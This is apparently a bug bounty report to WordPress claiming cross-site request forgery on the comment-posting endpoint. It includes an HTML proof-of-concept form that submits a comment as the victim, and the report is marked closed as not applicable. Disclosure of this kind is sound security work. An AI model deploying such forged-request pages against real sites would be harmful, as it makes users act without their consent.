CSRF on comment post
Medium
W
WordPress
Submitted None
Actions:
Reported by
lamscun
Vulnerability Details
Technical details and impact analysis
Hi Wordpress,
I just found an CSRF on comment post. It allow attacker make victim comments on a post.
## Steps To Reproduce:
Attacker send to victim a link with content below:
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wordpress-5.4.2/wordpress/wp-comments-post.php" method="POST">
<input type="hidden" name="comment" value="csrf_comment" />
<input type="hidden" name="submit" value="Post Comment" />
<input type="hidden" name="comment_post_ID" value="29" />
<input type="hidden" name="comment_parent" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
Video poc: {F891759}
## Impact
Attacker make victim comments on a post.
Report Details
Additional information and metadata
State
Closed
Substate
Not-Applicable
Submitted
Weakness
Cross-Site Request Forgery (CSRF)